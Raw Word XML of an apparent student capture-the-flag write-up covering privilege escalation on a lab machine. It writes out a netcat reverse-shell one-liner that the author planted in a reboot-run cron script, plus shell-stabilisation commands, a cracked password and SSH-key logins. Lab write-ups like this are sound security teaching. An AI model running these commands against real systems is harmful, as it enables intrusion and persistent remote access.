    <w:p w14:paraId="1DC7453D" w14:textId="5EF6B630" w:rsidR="00034B05" w:rsidRDefault="00034B05" w:rsidP="003A49E6">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Then, Isaiah Wong Terjie proceeded to run the command “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>cat /etc/crontab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">” to check any scheduled tasks. The list of commands can be found in </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="00736BC8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00243F33">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Later, Isaiah found out that there’s another user named “tweedledum” that runs “twasBrillig.sh” script when rebooting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA7A2EC" w14:textId="39B833C4" w:rsidR="00243F33" w:rsidRDefault="00243F33" w:rsidP="003A49E6">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F7E25EC" wp14:editId="3FA7B91C">
            <wp:extent cx="3924300" cy="1539112"/>
            <wp:effectExtent l="76200" t="76200" r="76200" b="80645"/>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4806" cy="1547155"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:scene3d>
                      <a:camera prst="orthographicFront"/>
                      <a:lightRig rig="threePt" dir="t"/>
                    </a:scene3d>
                    <a:sp3d contourW="57150">
                      <a:contourClr>
                        <a:schemeClr val="bg1"/>
                      </a:contourClr>
                    </a:sp3d>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA6C85B" w14:textId="70124A4D" w:rsidR="00243F33" w:rsidRDefault="00243F33" w:rsidP="003A49E6">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>After knowing that it only runs when rebooting, Isaiah proceeded to add a reverse shell into the “twasBrillig.sh”</w:t>
      </w:r>
      <w:r w:rsidR="00267DA2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> script file. The reverse shell can be found in several websites and there are many ways to do it but he decided to choose a shorter which doesn’t require us to copy the on from 25 Days Of Cyber but instead he got it from </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidR="00267DA2" w:rsidRPr="00736BC8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00267DA2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">. He tried the first one from the netcat section and the first did not work at all, so he switched to the second one which is “ </w:t>
      </w:r>
      <w:r w:rsidR="00267DA2" w:rsidRPr="00267DA2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 10.0.0.1 1234 &gt;/tmp/f</w:t>
      </w:r>
      <w:r w:rsidR="00267DA2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>” and it worked perfectly well once he turned on the listener.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB6681E" w14:textId="20113C2A" w:rsidR="0071224A" w:rsidRDefault="00243F33" w:rsidP="00267DA2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00243F33">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09991B18" wp14:editId="41073E55">
            <wp:extent cx="5062280" cy="419100"/>
            <wp:effectExtent l="57150" t="76200" r="62230" b="571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6166" cy="419422"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:scene3d>
                      <a:camera prst="orthographicFront"/>
                      <a:lightRig rig="threePt" dir="t"/>
                    </a:scene3d>
                    <a:sp3d contourW="38100">
                      <a:contourClr>
                        <a:schemeClr val="bg1"/>
                      </a:contourClr>
                    </a:sp3d>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFF2B22" w14:textId="77777777" w:rsidR="001620A6" w:rsidRDefault="001620A6" w:rsidP="00267DA2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51208DFE" w14:textId="77777777" w:rsidR="001620A6" w:rsidRDefault="001620A6" w:rsidP="00267DA2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B0D6905" w14:textId="77777777" w:rsidR="001620A6" w:rsidRDefault="001620A6" w:rsidP="00267DA2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54062915" w14:textId="77777777" w:rsidR="001620A6" w:rsidRDefault="001620A6" w:rsidP="00267DA2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E92A25B" w14:textId="77777777" w:rsidR="001620A6" w:rsidRDefault="001620A6" w:rsidP="00267DA2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54C05267" w14:textId="77777777" w:rsidR="001620A6" w:rsidRDefault="001620A6" w:rsidP="00267DA2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60BA0EBC" w14:textId="77777777" w:rsidR="001620A6" w:rsidRDefault="001620A6" w:rsidP="00267DA2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="553343BE" w14:textId="77777777" w:rsidR="001620A6" w:rsidRDefault="001620A6" w:rsidP="00267DA2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55B75918" w14:textId="77777777" w:rsidR="001620A6" w:rsidRDefault="001620A6" w:rsidP="00267DA2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="503DD539" w14:textId="2ABAA777" w:rsidR="00396EDE" w:rsidRDefault="00396EDE" w:rsidP="00267DA2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00396EDE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">3) </w:t>
      </w:r>
      <w:r w:rsidRPr="00396EDE">
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Horizontal Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5326C767" w14:textId="77777777" w:rsidR="001620A6" w:rsidRDefault="001620A6" w:rsidP="001620A6">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Members Involved</w:t>
      </w:r>
      <w:r>
        <w:t>: Isaiah Wong Terjie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BC8A38" w14:textId="48E4023F" w:rsidR="001620A6" w:rsidRPr="007155E4" w:rsidRDefault="001620A6" w:rsidP="001620A6">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Tools used</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SSH, Netcat, CyberChef</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090F4AFB" w14:textId="77777777" w:rsidR="001620A6" w:rsidRDefault="001620A6" w:rsidP="001620A6">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Thought Process and Methodology and Attempts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C33328A" w14:textId="77777777" w:rsidR="001620A6" w:rsidRPr="00396EDE" w:rsidRDefault="001620A6" w:rsidP="00267DA2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FC108EE" w14:textId="45C84A45" w:rsidR="00267DA2" w:rsidRPr="00D3632C" w:rsidRDefault="00267DA2" w:rsidP="00267DA2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>After launching the listener, Isaiah ran the command “</w:t>
      </w:r>
      <w:r w:rsidRPr="00267DA2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>sudo reboot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00D3632C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D3632C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>in order to get a reverse shell. Later, we are required to upgrade and stabilize the reverse shell from what we learned during the 25 Days Of Cyber. Firstly, we have to upgrade using “</w:t>
      </w:r>
      <w:r w:rsidR="00D3632C" w:rsidRPr="00D3632C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>python3 -c ‘import pty; pty.spawn(“/bin/bash”)</w:t>
      </w:r>
      <w:r w:rsidR="00D3632C" w:rsidRPr="00D3632C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="00D3632C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>” then following with export TERM=xterm and then ^Z. Suddenly, Javier Austin Anak Jawa thought we have to redo the process again because Isaiah Wong Terjie suspended the netcat listener, but instead he ran “</w:t>
      </w:r>
      <w:r w:rsidR="00D3632C" w:rsidRPr="00D3632C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>stty raw -echo; fg</w:t>
      </w:r>
      <w:r w:rsidR="00D3632C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>” to reconnect back to</w:t>
      </w:r>
      <w:r w:rsidR="009E160F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> the session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B83B0BA" w14:textId="6E36F3CA" w:rsidR="00F87103" w:rsidRDefault="00267DA2" w:rsidP="00267DA2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00267DA2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41F5789A" wp14:editId="4106E9F5">
            <wp:extent cx="3238952" cy="1200318"/>
            <wp:effectExtent l="76200" t="76200" r="76200" b="7620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3238952" cy="1200318"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:scene3d>
                      <a:camera prst="orthographicFront"/>
                      <a:lightRig rig="threePt" dir="t"/>
                    </a:scene3d>
                    <a:sp3d contourW="69850">
                      <a:contourClr>
                        <a:schemeClr val="bg1"/>
                      </a:contourClr>
                    </a:sp3d>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="485F6B0E" w14:textId="68EA26B8" w:rsidR="00F87103" w:rsidRPr="00D01647" w:rsidRDefault="00F87103" w:rsidP="00267DA2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Isaiah Wong Terjie decided to list out the files to check if there’s any clues and he found two files named “humptydumpty.txt” and “poem.txt”. But he opened the “humptydumpty.txt” file first and he witnessed a file full of hashes in it. He decided to decode the hashes in CyberChef and was given a password after decoding it.</w:t>
      </w:r>
      <w:r w:rsidR="00D01647">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> The password is “</w:t>
      </w:r>
      <w:r w:rsidR="00D01647" w:rsidRPr="00D01647">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>zyxwvutsrqponmlk</w:t>
      </w:r>
      <w:r w:rsidR="00D01647">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECE87D4" w14:textId="481EEC85" w:rsidR="00D01647" w:rsidRDefault="00F87103" w:rsidP="00267DA2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F87103">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58EEA61F" wp14:editId="000E6306">
            <wp:extent cx="3200847" cy="1991003"/>
            <wp:effectExtent l="76200" t="76200" r="76200" b="857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3200847" cy="1991003"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:scene3d>
                      <a:camera prst="orthographicFront"/>
                      <a:lightRig rig="threePt" dir="t"/>
                    </a:scene3d>
                    <a:sp3d contourW="57150">
                      <a:contourClr>
                        <a:schemeClr val="bg1"/>
                      </a:contourClr>
                    </a:sp3d>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF74DB8" w14:textId="251FCE81" w:rsidR="00D01647" w:rsidRDefault="00D01647" w:rsidP="00267DA2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D01647">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="745239AD" wp14:editId="20892360">
            <wp:extent cx="3896269" cy="2905530"/>
            <wp:effectExtent l="76200" t="76200" r="66675" b="666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3896269" cy="2905530"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:scene3d>
                      <a:camera prst="orthographicFront"/>
                      <a:lightRig rig="threePt" dir="t"/>
                    </a:scene3d>
                    <a:sp3d contourW="57150">
                      <a:contourClr>
                        <a:schemeClr val="bg1"/>
                      </a:contourClr>
                    </a:sp3d>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1122F8FB" w14:textId="58F40990" w:rsidR="00D01647" w:rsidRDefault="00D01647" w:rsidP="00267DA2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Later, </w:t>
      </w:r>
      <w:r w:rsidR="00CA1D40">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Isaiah</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> switch users to humptydumpty with credentials given</w:t>
      </w:r>
      <w:r w:rsidR="00CA1D40">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> and switched the directory in order to list out the contents inside of humptydumpty’s directory. The contents found in the directory was poetry.txt which we he found another name called Alice. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373CAE05" w14:textId="4C21199F" w:rsidR="00AA6EF3" w:rsidRDefault="00CA1D40" w:rsidP="001620A6">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FBBB86C" wp14:editId="713AC88B">
            <wp:extent cx="4819650" cy="581025"/>
            <wp:effectExtent l="76200" t="76200" r="76200" b="857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9650" cy="581025"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:scene3d>
                      <a:camera prst="orthographicFront"/>
                      <a:lightRig rig="threePt" dir="t"/>
                    </a:scene3d>
                    <a:sp3d contourW="63500">
                      <a:contourClr>
                        <a:schemeClr val="bg1"/>
                      </a:contourClr>
                    </a:sp3d>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD66880" w14:textId="56CF664A" w:rsidR="005D70C9" w:rsidRPr="005D70C9" w:rsidRDefault="005D70C9" w:rsidP="005D70C9">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Next, he switched the directory to home and listed out the directories. He found out there’s a directory for alice, so we know that alice is also running on OpenSSH. Isaiah tried to list out the contents of alice but the permission was denied multiple times. So he googled and found out that in every “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>.ssh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>” there’s a default key file named “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>id_rsa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FB5E2C" w14:textId="0CD0D83F" w:rsidR="005D70C9" w:rsidRDefault="005D70C9" w:rsidP="005D70C9">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D70C9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="749651A7" wp14:editId="1B570C6D">
            <wp:extent cx="2676525" cy="3182896"/>
            <wp:effectExtent l="76200" t="76200" r="66675" b="7493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stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2686415" cy="3194657"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:scene3d>
                      <a:camera prst="orthographicFront"/>
                      <a:lightRig rig="threePt" dir="t"/>
                    </a:scene3d>
                    <a:sp3d contourW="50800">
                      <a:contourClr>
                        <a:schemeClr val="bg1"/>
                      </a:contourClr>
                    </a:sp3d>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="43049FA9" w14:textId="0853D386" w:rsidR="001430EF" w:rsidRPr="00C750CB" w:rsidRDefault="001430EF" w:rsidP="005D70C9">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Later, he proceeded to “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>nano id_rsa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>” in order to paste the private key. After that, Isaiah</w:t>
      </w:r>
      <w:r w:rsidR="00396EDE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> used chmod 600 on the file to change the permission to read and write. Then, he continued by running “</w:t>
      </w:r>
      <w:r w:rsidR="00396EDE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">ssh -i id_rsa </w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidR="00396EDE" w:rsidRPr="00736BC8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>alice@10.10.217.200</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00396EDE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">” to let the machine know that we are login with a key file. After he managed to login </w:t>
      </w:r>
      <w:r w:rsidR="00C750CB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>and he tried to use “</w:t>
      </w:r>
      <w:r w:rsidR="00C750CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>sudo -l</w:t>
      </w:r>
      <w:r w:rsidR="00C750CB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>” to list the users’ privilege but instead it requires a password. Isaiah proceed to list out the files that are inside the alice directory and it shows a “</w:t>
      </w:r>
      <w:r w:rsidR="00C750CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>kitten.txt”</w:t>
      </w:r>
      <w:r w:rsidR="00C750CB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> file which is not useful at all.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759BFC12" w14:textId="040FFDDA" w:rsidR="001430EF" w:rsidRDefault="001430EF" w:rsidP="005D70C9">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001430EF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="586A409E" wp14:editId="6B284C9C">
            <wp:extent cx="3571875" cy="2612226"/>
            <wp:effectExtent l="76200" t="76200" r="85725" b="7429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stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3581852" cy="2619522"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:scene3d>
                      <a:camera prst="orthographicFront"/>
                      <a:lightRig rig="threePt" dir="t"/>
                    </a:scene3d>
                    <a:sp3d contourW="63500">
                      <a:contourClr>
                        <a:schemeClr val="bg1"/>
                      </a:contourClr>
                    </a:sp3d>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="396C1958" w14:textId="77777777" w:rsidR="001620A6" w:rsidRDefault="001620A6" w:rsidP="00DE101F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59E4AF8C" w14:textId="77777777" w:rsidR="001620A6" w:rsidRDefault="001620A6" w:rsidP="00DE101F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AEB95AF" w14:textId="77777777" w:rsidR="001620A6" w:rsidRDefault="001620A6" w:rsidP="00DE101F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6612D374" w14:textId="77777777" w:rsidR="001620A6" w:rsidRDefault="001620A6" w:rsidP="00DE101F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="699E276E" w14:textId="77777777" w:rsidR="001620A6" w:rsidRDefault="001620A6" w:rsidP="00DE101F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D0F149B" w14:textId="77777777" w:rsidR="001620A6" w:rsidRDefault="001620A6" w:rsidP="00DE101F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DF79B8D" w14:textId="77777777" w:rsidR="001620A6" w:rsidRDefault="001620A6" w:rsidP="00DE101F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="095EF20F" w14:textId="77777777" w:rsidR="001620A6" w:rsidRDefault="001620A6" w:rsidP="00DE101F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C0AA763" w14:textId="77777777" w:rsidR="001620A6" w:rsidRDefault="001620A6" w:rsidP="00DE101F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B499D99" w14:textId="77777777" w:rsidR="001620A6" w:rsidRDefault="001620A6" w:rsidP="00DE101F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2911D955" w14:textId="77777777" w:rsidR="001620A6" w:rsidRDefault="001620A6" w:rsidP="00DE101F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E0AFBE8" w14:textId="77777777" w:rsidR="001620A6" w:rsidRDefault="001620A6" w:rsidP="00DE101F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CFD7DC9" w14:textId="77777777" w:rsidR="001620A6" w:rsidRDefault="001620A6" w:rsidP="00DE101F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
